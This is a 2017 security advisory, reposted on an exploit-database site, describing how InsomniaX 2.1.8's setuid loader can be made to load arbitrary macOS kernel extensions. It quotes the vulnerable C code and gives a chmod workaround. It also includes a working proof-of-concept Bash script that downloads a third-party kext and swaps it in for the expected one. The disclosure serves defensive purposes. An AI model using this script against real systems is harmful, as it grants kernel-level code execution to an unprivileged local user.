0day.today - Biggest Exploit Database in the World.
InsomniaX 2.1.8 Arbitrary Kernel Extension Loading Vulnerability
------------------------------------------------------------------------
InsomniaX loader allows loading of arbitrary Kernel Extensions
------------------------------------------------------------------------
Yorick Koster, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the loader application bundled with InsomniaX can be
used to load arbitrary Kernel Extensions (kext). The loader is normally
used to load a kext file that is needed to disable the Lid Sleep. A flaw
has been found in the loader that allows a local attacker to load (or
unload) any arbitrary kext file.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- http://semaja2.net/2017/06/insomniax-security-notice/
- http://semaja2.net/2017/06/thank-you-and-farewell-for-now/

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on InsomniaX version 2.1.8.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available. The author of InsomniaX reports
that InsomniaX is no longer supported. As a workaround, remove the
setuid bit from the loader file. Doing so will prevent users from
disabling the Lid Sleep.

sudo chmod u-s /Applications/InsomniaX.app/Contents/Resources/loader

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170405/insomniax-loader-allows-loading-of-arbitrary-kernel-extensions.html

This issue exists because InsomniaX tries to load the kext file from the
user's home folder. When started, the loader first changes the owner of
the kext file to user root and group wheel. This is required, or else the
kext loader will refuse to load the kext. After changing the owner, the
loader calls kextload with the path set to the kext located in the
user's home directory. Replacing InsomniaX's kext with a different one
will cause the loader to load this kext instead.

struct passwd *pw = getpwuid(getuid());
char *homedir = pw->pw_dir;
char *supportPath = strcat(homedir, "/Library/Application Support/InsomniaX");
const char *kextPath = strcat(supportPath, "/Insomnia_r11.kext");

switch(myCommand->authorizedCommandId)
{
	case kMyAuthorizedLoad:
	{
		/* Child code. */
		if(fork() == 0)
		{
#ifdef DEBUG
			fprintf(stderr, "CHOWN\n");
#endif
			dup2(2,1);
			execl("/usr/sbin/chown", "chown", "-R", "root:wheel", kextPath, NULL);
		}
		/* Parent code. */
		else
		{
			wait(&status);
			/* Child code. */
			if(fork() == 0)
			{
#ifdef DEBUG
				fprintf(stderr, "KEXTLOAD\n");
#endif
				dup2(2,1);
				execl("/sbin/kextload", "kextload", kextPath, NULL);
			}

This issue can be demonstrated using the following steps:

- start InsomniaX
- run the Bash script below
- click on the InsomniaX icon in the menu bar and select Disable Lid Sleep
- run kextstat -l -b com.google.MacPmem to check if the kext is loaded

#!/bin/bash
mv ~/Library/Application\ Support/InsomniaX ~/Library/Application\ Support/InsomniaX.O
mkdir -p ~/Library/Application\ Support/InsomniaX
cd ~/Library/Application\ Support/InsomniaX
curl -L https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip --output osxpmem-2.1.post4.zip
unzip osxpmem-2.1.post4.zip
mv osxpmem.app/MacPmem.kext/ Insomnia_r11.kext

# 0day.today [2024-11-14] #